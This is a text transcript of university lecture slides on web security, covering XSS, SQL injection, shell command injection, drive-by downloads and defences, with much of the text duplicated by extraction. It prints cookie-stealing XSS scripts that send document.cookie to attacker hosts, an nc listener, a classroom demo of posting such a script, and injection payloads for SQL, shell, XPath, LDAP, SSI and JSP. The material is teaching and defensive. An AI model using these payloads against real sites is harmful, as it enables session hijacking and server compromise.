web security. objectives understand the complexity of web infrastructure and current trends of web...
TRANSCRIPT
Web SecurityWeb Security
ObjectivesObjectives
Understand the complexity of Understand the complexity of Web infrastructure and current Web infrastructure and current trends of Web threattrends of Web threat
Understand the mechanisms and Understand the mechanisms and defense of major Web attacks: defense of major Web attacks: XSS, SQL injection and shell XSS, SQL injection and shell attacksattacks
Why Web Security: Why Web Security: a Real Business a Real Business ProblemProblem
> 60% of total attack attempts > 60% of total attack attempts observed on the Net are against observed on the Net are against Web applicationsWeb applications
> 80% of vulnerabilities discovered > 80% of vulnerabilities discovered are in web appsare in web apps
Independent security auditIndependent security audit Regulatory complianceRegulatory compliance
Auditor findingAuditor finding Freeform edit boxFreeform edit box
– Message to Customer Message to Customer ServiceService
XSS issue raisedXSS issue raised Must provide a Must provide a
response:response:– Prove issue to be a Prove issue to be a
non-problemnon-problemoror
– Describe actions to Describe actions to take take
Anatomy of Web Anatomy of Web AttacksAttacks
1.1. Attacker breaks into a legitimate website and posts Attacker breaks into a legitimate website and posts malwaremalware• Malware is no longer exclusive to malicious Web sites.Malware is no longer exclusive to malicious Web sites.
2.2. Attacking end-user machines.Attacking end-user machines.• Malware on a Web site makes its way down on to a userMalware on a Web site makes its way down on to a user
’’ s machine when that user visits the host Web site. s machine when that user visits the host Web site. • ““ Drive-by-downloadDrive-by-download”” – happens automatically with no – happens automatically with no
user interaction required user interaction required • Additional techniques which do require some input from Additional techniques which do require some input from
the user, but in practice are equally, if not more so, the user, but in practice are equally, if not more so, effective.effective.
3.3. Leveraging end user machines for malicious activity. Leveraging end user machines for malicious activity.
Anatomy of Web Anatomy of Web AttacksAttacks
Source: Web Based Attacks, Symantec 2009Source: Web Based Attacks, Symantec 2009
Big trend: software as a (Web-based) Big trend: software as a (Web-based) serviceservice– Online banking, shopping, government, etc.Online banking, shopping, government, etc.– Cloud computingCloud computing
Applications hosted on Web serversApplications hosted on Web servers– Written in a mixture of PHP, Java, Perl, Python, Written in a mixture of PHP, Java, Perl, Python,
C, ASPC, ASP Security is rarely the main concernSecurity is rarely the main concern
– Poorly written scripts with inadequate input Poorly written scripts with inadequate input validationvalidation
– Sensitive data stored in world-readable filesSensitive data stored in world-readable files
Web ApplicationsWeb Applications
Runs on a Web server or application serverRuns on a Web server or application server Takes input from Web users (via Web server)Takes input from Web users (via Web server) Interacts with back-end databases and third Interacts with back-end databases and third
partiesparties Prepares and outputs results for users (via Web Prepares and outputs results for users (via Web
server)server)– Dynamically generated HTML pagesDynamically generated HTML pages– Contain content from many different sources, often Contain content from many different sources, often
including regular usersincluding regular users Blogs, social networks, photo-sharing websites…Blogs, social networks, photo-sharing websites… Web advertisements, usually third partyWeb advertisements, usually third party
– A webpage can have content coming from 10-20 A webpage can have content coming from 10-20 different domainsdifferent domains
Typical Web Application Typical Web Application DesignDesign
Two Sides of Web Two Sides of Web SecuritySecurity
Web browser (front end)Web browser (front end)– Can be attacked by any website it visitsCan be attacked by any website it visits– Attacks lead to malware installation (keyloggers, Attacks lead to malware installation (keyloggers,
botnets), document theft, loss of private databotnets), document theft, loss of private data Web application (back end)Web application (back end)
– Runs at websiteRuns at website Banks, online merchants, blogs, Google Apps, etc.Banks, online merchants, blogs, Google Apps, etc.
– Written in Javascript, PHP, ASP, JSP, Ruby, …Written in Javascript, PHP, ASP, JSP, Ruby, …– Many potential bugs: XSS, SQL injection, XSRFMany potential bugs: XSS, SQL injection, XSRF– Attacks lead to stolen credit cards, defaced sites, Attacks lead to stolen credit cards, defaced sites,
etc.etc.
Chicago Tribune Home PageChicago Tribune Home Page
How Are Legitimate Web How Are Legitimate Web Sites Compromised?Sites Compromised?
SQL Injection AttacksSQL Injection Attacks Cross-site scripting (XSS) attacksCross-site scripting (XSS) attacks Vulnerabilities in the Web server or forum Vulnerabilities in the Web server or forum
hosting software (e.g., shell attacks)hosting software (e.g., shell attacks) Malicious AdvertisementsMalicious Advertisements
– Many Web sites today display advertisements Many Web sites today display advertisements hosted by third-party advertising siteshosted by third-party advertising sites
– Volume of ads published automatically makes Volume of ads published automatically makes detection difficultdetection difficult
– Random appearances further compounds the Random appearances further compounds the detectiondetection
Search Engine Result RedirectionSearch Engine Result Redirection Attacks on the backend virtual hosting Attacks on the backend virtual hosting
companiescompanies
slide slide 1313
JavaScriptJavaScript Language executed by browserLanguage executed by browser
– Scripts are embedded in Web pagesScripts are embedded in Web pages– Can run before HTML is loaded, before page is Can run before HTML is loaded, before page is
viewed, while it is being viewed or when leaving viewed, while it is being viewed or when leaving the pagethe page
Used to implement Used to implement ““ activeactive”” web pages web pages– AJAX, huge number of Web-based applicationsAJAX, huge number of Web-based applications
Many security and correctness issuesMany security and correctness issues– Attacker gets to execute some code on user’s Attacker gets to execute some code on user’s
machinemachine– Often used to exploit other vulnerabilitiesOften used to exploit other vulnerabilities
Cross Site ScriptingCross Site Scripting
Attacker goal: their code into Attacker goal: their code into browserbrowser
XSS forces a website visitor to XSS forces a website visitor to execute malicious code in his/her execute malicious code in his/her browserbrowser
Count for roughly 80% of all Count for roughly 80% of all documented security documented security vulnerabilitiesvulnerabilities
XSS RisksXSS Risks
XSS abuses render engines or XSS abuses render engines or plug-insplug-ins
Steal browser cookiesSteal browser cookies Steal session info for replay Steal session info for replay
attackattack Malware or bot installationMalware or bot installation Redirect or phishing attemptRedirect or phishing attempt
XSS Example 1XSS Example 1 Trudy posts the following JavaScript on a Trudy posts the following JavaScript on a
message board:message board: <script language="javascript"> <script language="javascript">
var url = var url = "http://machineaddress:5000/index.html?"http://machineaddress:5000/index.html?cookie=cookie=““ + encodeURI(document.cookie); + encodeURI(document.cookie); </script> </script>
Then run a TCP server listening on port Then run a TCP server listening on port 5000 with e.g., nc –l 50005000 with e.g., nc –l 5000
When Bob views the posted message, his When Bob views the posted message, his browser executes the malicious script, and browser executes the malicious script, and his session cookie is sent to Trudyhis session cookie is sent to Trudy
Web
Atta
ck Dem
o Flo
w
Ch
art
XSS Demo InstructionsXSS Demo Instructions Set port forward to bypass the firewallSet port forward to bypass the firewall
ssh -L 9000:netsec-demos:2000 ssh -L 9000:netsec-demos:2000 [email protected]
Note: 9000 is the local port, it's forwarded to Note: 9000 is the local port, it's forwarded to netsec-demos port 2000 through hamsa proxynetsec-demos port 2000 through hamsa proxy
Use Use http://localhost:9000 to access to access http://netsec-demos.cs.northwestern.edu:2000
XSS Demo Instructions XSS Demo Instructions (II)(II)
Login as ychen and post the script with a Login as ychen and post the script with a sexy title (e.g., hot game!)sexy title (e.g., hot game!)
<script language="javascript"><script language="javascript">
var url = "http://netsec.cs.northwestern.edu:5000/index.html?var url = "http://netsec.cs.northwestern.edu:5000/index.html?cookie=";cookie=";
url = url + encodeURI(document.cookie);url = url + encodeURI(document.cookie);
new Image().src=url;new Image().src=url;
</script></script>
Hi Everyone! Thanks for your cookies!Hi Everyone! Thanks for your cookies!
Ssh to that machine (e.g., Ssh to that machine (e.g., netsec.cs.northwestern.edu) and runnetsec.cs.northwestern.edu) and run
nc –l –p 5000 nc –l –p 5000
Simple XSS CodeSimple XSS Codevar url = var url =
"http://machineaddress:5000/index.html?"http://machineaddress:5000/index.html?cookie=cookie=““ + encodeURI(document.cookie);+ encodeURI(document.cookie);
document.cookie is the browser's entire document.cookie is the browser's entire cookie for the current website cookie for the current website
encodeURI() is a javascript function to hex-encodeURI() is a javascript function to hex-encode certain characters to be included encode certain characters to be included as part of a URLas part of a URL– E.g., changing the space character to %20E.g., changing the space character to %20– Make the URL less suspiciousMake the URL less suspicious
What can Trudy Do with What can Trudy Do with the Cookie?the Cookie?
Another user test458 login as and when Another user test458 login as and when clicking the post, cookie is sent to the attackerclicking the post, cookie is sent to the attacker
Crack BobCrack Bob’’ s password (MD5 hash in the s password (MD5 hash in the cookie) with John the Ripper, Hydra, or any cookie) with John the Ripper, Hydra, or any password crackerpassword cracker
For more info, For more info, http://netsec.cs.northwestern.edu/resources/password-http://netsec.cs.northwestern.edu/resources/password-cracking/cracking/
Use a Firefox plugin like Tamperdata to reset Use a Firefox plugin like Tamperdata to reset your cookies to impersonate Bobyour cookies to impersonate Bob
XSS DetectionXSS Detection A client usually is not supposed to send A client usually is not supposed to send
scripts to serversscripts to servers If the server receives <SCRIPT>… or the If the server receives <SCRIPT>… or the
hex equivalent in an incoming packet and hex equivalent in an incoming packet and that same script is sent unsanitized in an that same script is sent unsanitized in an outgoing packet, then an attack has outgoing packet, then an attack has occurredoccurred– A sanitized script could look like &ls;SCRIPT>A sanitized script could look like &ls;SCRIPT>
…… Any user input Any user input mustmust be preprocessed be preprocessed
before it is used inside HTMLbefore it is used inside HTML
SQL InjectionSQL Injection
Malicious SQL statements run on a Malicious SQL statements run on a database and thus attack the serverdatabase and thus attack the server
– XSS can only target other usersXSS can only target other users
SQL Injection ExampleSQL Injection Example Trudy accesses BobTrudy accesses Bob’’ s website; in which he does not s website; in which he does not
validate input on his sign in formvalidate input on his sign in form– Runs a SQL statement like the following:Runs a SQL statement like the following:– select username, user_password from select username, user_password from
minibbtable_users where user_password = minibbtable_users where user_password = md5('johnspassword') and username='johndoemd5('johnspassword') and username='johndoe’’ ; ;
Set username to ' or '1'='1 Set username to ' or '1'='1 select username, user_password from select username, user_password from
minibbtable_users where user_password = minibbtable_users where user_password = md5('anyrandompassword') and username='' or md5('anyrandompassword') and username='' or '1'='1'1'='1’’ ; ;
Effect: picks any row where the username is blank Effect: picks any row where the username is blank and the password matches or any row where true.and the password matches or any row where true.
Add Add ““ limit 1limit 1”” to pick the first row to pick the first row
SQL Injection SQL Injection DetectionDetection
Input validation on any outgoing SQL Input validation on any outgoing SQL statements from the web server to the statements from the web server to the database serverdatabase server– FilterFilter
Apostrophes, semicolons, percent symbols, hyphens, Apostrophes, semicolons, percent symbols, hyphens, underscores, …underscores, …
Any character that has special meanings must be Any character that has special meanings must be escaped, .e.g., convert escaped, .e.g., convert ’’ into \ into \’’
– Only works for string inputsOnly works for string inputs– Different databases have different rules for escapingDifferent databases have different rules for escaping
– Check the data type (e.g., make sure itCheck the data type (e.g., make sure it’’ s an s an integer)integer)
Shell AttacksShell Attacks
Control an actual machine like Control an actual machine like a web servera web server
Shell AttacksShell Attacks
Inject commands into scripts that Inject commands into scripts that use Linux utilitiesuse Linux utilities– E.g., with E.g., with ““ ;;”” as command separator as command separator
in UNIX/LINUXin UNIX/LINUX CGI programs like perl can use CGI programs like perl can use
command-line programs (e.g. grep, command-line programs (e.g. grep, ls)ls)
Unsanitized input as arguments Unsanitized input as arguments can lead to command execution.can lead to command execution.
Shell Attacks DemoShell Attacks Demo
Search engine in MiniBB webserver Search engine in MiniBB webserver executesexecutes
system("echo $user_usr " . $phrase . " system("echo $user_usr " . $phrase . " >>/tmp/searchlogs");>>/tmp/searchlogs");
Put phrase as: >Put phrase as: >/dev/null; id; echo /dev/null; id; echo randomdata randomdata – Hide user IDHide user ID– Store random data in logs to evade detectionStore random data in logs to evade detection
Discussion of Symantec White Papers:Discussion of Symantec White Papers:
GETTING ONTO A USERGETTING ONTO A USER’’ S COMPUTERS COMPUTER(AUTOMATICALLY)(AUTOMATICALLY)
GETTING ONTO A USERGETTING ONTO A USER’’ S COMPUTER S COMPUTER
Source: Web Based Attacks, Symantec 2009Source: Web Based Attacks, Symantec 2009
Drive-by Download Drive-by Download AttacksAttacks
Deliver malware from Websites to Deliver malware from Websites to a users computer.a users computer.
ExposureExposure– Browsing a websiteBrowsing a website– No user interaction is requiredNo user interaction is required– Executable content is automatically Executable content is automatically
downloadeddownloaded
““ Click JackingClick Jacking””
GETTING ONTO A USERGETTING ONTO A USER’’ S COMPUTERS COMPUTER(WITH A LITTLE HELP FROM THE USER)(WITH A LITTLE HELP FROM THE USER)
Social EngineeringSocial Engineering
Source: Web Based Attacks, Symantec 2009Source: Web Based Attacks, Symantec 2009
• People are tricked into performing actions they would not otherwise want to perform
Types of Social Types of Social Engineering AttacksEngineering Attacks Fake CodecFake Codec Malicious Peer-to-Peer (P2P) FilesMalicious Peer-to-Peer (P2P) Files Malicious AdvertisementsMalicious Advertisements Fake Scanner Web PageFake Scanner Web Page Blog SpamBlog Spam Other Attack VectorsOther Attack Vectors
– SpamSpam– Pirated softwarePirated software
Fake CodecFake Codec
User is prompted to install a missing User is prompted to install a missing codeccodec
Codec is actually malware codeCodec is actually malware code– Usually a trojan horseUsually a trojan horse
Malicious Peer-to-Peer Malicious Peer-to-Peer (P2P) Files(P2P) Files Malware authors bind content into popular Malware authors bind content into popular
applicationsapplications– Files named after celebrities, popular Files named after celebrities, popular
bandsbands– Uploaded to popular P2P sites where they Uploaded to popular P2P sites where they
are downloaded by unsuspecting usersare downloaded by unsuspecting users Openly available how-to materials on the Openly available how-to materials on the
internetinternet– Details how to build and distribute Details how to build and distribute
malwaremalware– Pay-Per-Install malwarePay-Per-Install malware
Fake Scanner Web Fake Scanner Web PagePage
Create a web site or product Create a web site or product that misrepresents the truththat misrepresents the truth– JavaScript pop-ups notifying of JavaScript pop-ups notifying of
false need to install operating false need to install operating system updatessystem updates
Source: Web Based Attacks, Symantec 2009
–Tools that claim to scan for and remove adult images, etc.
Blog SpamBlog Spam
Alluring links posted on blogs Alluring links posted on blogs – Links embedded in blog commentsLinks embedded in blog comments– Direct users to sites that leverage Direct users to sites that leverage
social engineering tricks or browser social engineering tricks or browser exploits to spread malwareexploits to spread malware
Other Attack VectorsOther Attack Vectors
SpamSpam– Emails contain links directing people Emails contain links directing people
to drive by download, fake to drive by download, fake scanner/codec, and malware sitesscanner/codec, and malware sites
Pirated software sitesPirated software sites– Pirated versions of software are Pirated versions of software are
bundled with or comprised solely of bundled with or comprised solely of trojan horsestrojan horses
How to Protect How to Protect YourselfYourself(Client side)(Client side) Update and Patch SoftwareUpdate and Patch Software
– Get latest OS, Browser, Application patchesGet latest OS, Browser, Application patches– Browser Plug-in updates often forgottenBrowser Plug-in updates often forgotten
Endpoint Protection SoftwareEndpoint Protection Software– Anti-virus software for signature based detection Anti-virus software for signature based detection
and behavioral monitoringand behavioral monitoring– Update Protection Software SubscriptionUpdate Protection Software Subscription
Could miss 70,000 new unique virus variants for one Could miss 70,000 new unique virus variants for one weekweek
Be SuspiciousBe Suspicious– Avoid things that seem too good to be trueAvoid things that seem too good to be true
Adopt Strong Password PolicyAdopt Strong Password Policy
Web Reputation SystemsWeb Reputation Systems(ISP/Enterprise side)(ISP/Enterprise side)
Web Reputation Agent (agent) will first Web Reputation Agent (agent) will first check blacklist/whitelist database check blacklist/whitelist database deployed locally.deployed locally.
If the URLs in the database, agent If the URLs in the database, agent allows/rejects the URL requests DIRECTLY.allows/rejects the URL requests DIRECTLY.
Otherwise, agent will send the URL to Otherwise, agent will send the URL to Intelligent Cloud Network for deeper Intelligent Cloud Network for deeper detection.detection.
Web Reputation Agent (agent) will first Web Reputation Agent (agent) will first check blacklist/whitelist database check blacklist/whitelist database deployed locally.deployed locally.
If the URLs in the database, agent If the URLs in the database, agent allows/rejects the URL requests DIRECTLY.allows/rejects the URL requests DIRECTLY.
Otherwise, agent will send the URL to Otherwise, agent will send the URL to Intelligent Cloud Network for deeper Intelligent Cloud Network for deeper detection.detection.
Web Reputation
Agent
Web Reputation
Agent
Local Blacklist/Whitelist
Database
Local Blacklist/Whitelist
Database
Web Reputation System in Intelligent Cloud NetworkWeb Reputation System in Intelligent Cloud Network
SummarySummary
Complexity of Web infrastructure Complexity of Web infrastructure and current trends of Web threatand current trends of Web threat
Mechanisms and defense of major Mechanisms and defense of major Web attacksWeb attacks– XSSXSS– SQL injection SQL injection – Shell attacksShell attacks
New Web attack trends in New Web attack trends in Symantec white paperSymantec white paper
Backup SlidesBackup Slides
Defense ApproachesDefense Approaches
Web firewall/IDSWeb firewall/IDS– ModSecurity for ApacheModSecurity for Apache– Commercial: SecureSphere from ImpervaCommercial: SecureSphere from Imperva
Static code analysisStatic code analysis– Open source: NiktoOpen source: Nikto– Commercial: Commercial:
Acutenix Web Vulnerability ScannerAcutenix Web Vulnerability Scanner N-stalkerN-stalker
Education on good codingEducation on good coding– HTML encoding on input (server-side)HTML encoding on input (server-side)– Input validation/filteringInput validation/filtering
Existing Systems Existing Systems ComparisonComparisonContent-based/URL-based
Dynamic/Static
Training Set Input Output
IronPort Both Mixed URLs from 100,000 Orgs
URL Malware, Phishing, and Spam
Safe Browsing
Content-based
Dynamic N/A URL Malware and Phishing
Web of Trust
URL-based Static User Comments URL Malware, Phishing, and Spam
Trend Micro Web Rep
Both Mixed Not Public URL Malware, Phishing, and Spam
McAfee Both Mixed Not Public URL Malware, Phishing, and Spam
Web Reputation Agent
Web Reputation Agent
Web Sandbox
(Dynamically executing WebPages )
Web Sandbox
(Dynamically executing WebPages )
URL Classification
Engine
URL Classification
Engine
Crowd Sourcing Engine
Crowd Sourcing Engine
Phishing Detection
Engine
Phishing Detection
Engine
Result Processi
ng Center
Result Processi
ng Center
Webpage Static
Detection Engine
Webpage Static
Detection Engine
Web Reputation Agent passes URLs to four fast detecting engines: Crowd Web Reputation Agent passes URLs to four fast detecting engines: Crowd Sourcing, URL Classification, Phishing Detection and webpage static engines.Sourcing, URL Classification, Phishing Detection and webpage static engines.
These four engines are lightweight and therefore they can detect very fast. These four engines are lightweight and therefore they can detect very fast. These four engines return the scores to Result Processing Center (RPC), These four engines return the scores to Result Processing Center (RPC),
which standardized the four scores and generate a final score. which standardized the four scores and generate a final score. If the final score strongly indicates the URLs are legitimate or malicious, RPC If the final score strongly indicates the URLs are legitimate or malicious, RPC
returns the score to Web Reputation. Otherwise, RPC passes the URLs to returns the score to Web Reputation. Otherwise, RPC passes the URLs to Web Sandbox, which is a heavyweight detecting engine and will detect the Web Sandbox, which is a heavyweight detecting engine and will detect the URL by executing the contents in the URL. URL by executing the contents in the URL.
Intelligent Cloud Network
XSS Example 2XSS Example 2
Trudy sends a link of the following URL to Bob Trudy sends a link of the following URL to Bob that will take him to a personalized page:that will take him to a personalized page:
http://host/personalizedpage.php?http://host/personalizedpage.php?username=<script>document.location='http:/username=<script>document.location='http://trudyhost/cgi-bin//trudyhost/cgi-bin/stealcookie.cgi?'+document.cookie</script>stealcookie.cgi?'+document.cookie</script>
A page is returned that contains the malicious A page is returned that contains the malicious script, and Bobscript, and Bob’’ s browser executes the script s browser executes the script causing his session cookie to be sent to Trudycausing his session cookie to be sent to Trudy
Hex is often used in place of ASCII for the Hex is often used in place of ASCII for the JavaScript to make the URL less suspiciousJavaScript to make the URL less suspicious
XPATH Injection XPATH Injection ExampleExample Similar to SQL injectionSimilar to SQL injection Bob has a form that does not sanitize user-Bob has a form that does not sanitize user-
provided input before using it as part of an provided input before using it as part of an XPATH query::XPATH query::– string(//user[name/text()=string(//user[name/text()=’’ USER_NAME' and USER_NAME' and
password/text()=password/text()=’’ USER_PASS']/account/text())USER_PASS']/account/text()) Trudy again can provide the following Trudy again can provide the following
password to change the statementpassword to change the statement’’ s logic: s logic: – XX ’’ OR OR ‘‘ xx ’’ == ‘‘ xx– The statement thus selects the first accountThe statement thus selects the first account
LDAP Injection LDAP Injection ExampleExample Server using LDAP for authenticationServer using LDAP for authentication
– User name initialized, but then uses User name initialized, but then uses unchecked user input to create a queryunchecked user input to create a query
filter = "(uid=" + CStr(userName) + ")" ' filter = "(uid=" + CStr(userName) + ")" ' searching for the user entrysearching for the user entry
Attacker can exploit using special Attacker can exploit using special characterscharacters
http://example/ldapsearch.asp?user=*http://example/ldapsearch.asp?user=*
LDAP Injection LDAP Injection DetectionDetection Detection is based off of usage of Detection is based off of usage of
special LDAP charactersspecial LDAP characters– System monitors input for special System monitors input for special
characterscharacters– Either scrubs incoming input or Either scrubs incoming input or
watches for unescaped output watches for unescaped output passed to database serverpassed to database server
Detection approach is blackboxDetection approach is blackbox
SSI Injection ExampleSSI Injection Example
Bob has his server configured to use Bob has his server configured to use Server-Side IncludesServer-Side Includes
Trudy passes input with an SSI embeddedTrudy passes input with an SSI embedded
<!--#INCLUDE VIRTUAL="/web.config"--><!--#INCLUDE VIRTUAL="/web.config"--> SSI inserts malicious code into normal SSI inserts malicious code into normal
webpages upon next requestwebpages upon next request Future legitimate users get content Future legitimate users get content
containing the tainted code included by containing the tainted code included by the SSIthe SSI
JSP Injection ExampleJSP Injection Example
Similar to SSI injectionSimilar to SSI injection Bob has a portal server configured Bob has a portal server configured
to use dynamic code for templatesto use dynamic code for templates Trudy passes input with an Trudy passes input with an
embedded <jsp:include embedded <jsp:include ““ http://bad.com/1.jsphttp://bad.com/1.jsp”” > >
malicious code inserted into malicious code inserted into webpagewebpage
JSP Injection JSP Injection PreventionPrevention Prefer static include <%include …>Prefer static include <%include …> DonDon’’ t allow file inclusion outside of t allow file inclusion outside of
server via Java2 Security policiesserver via Java2 Security policies Firewall rules to prevent outbound Firewall rules to prevent outbound
requests from serverrequests from server Input validation codingInput validation coding Choose portal software not Choose portal software not
requiring dynamic includes or code requiring dynamic includes or code executionexecution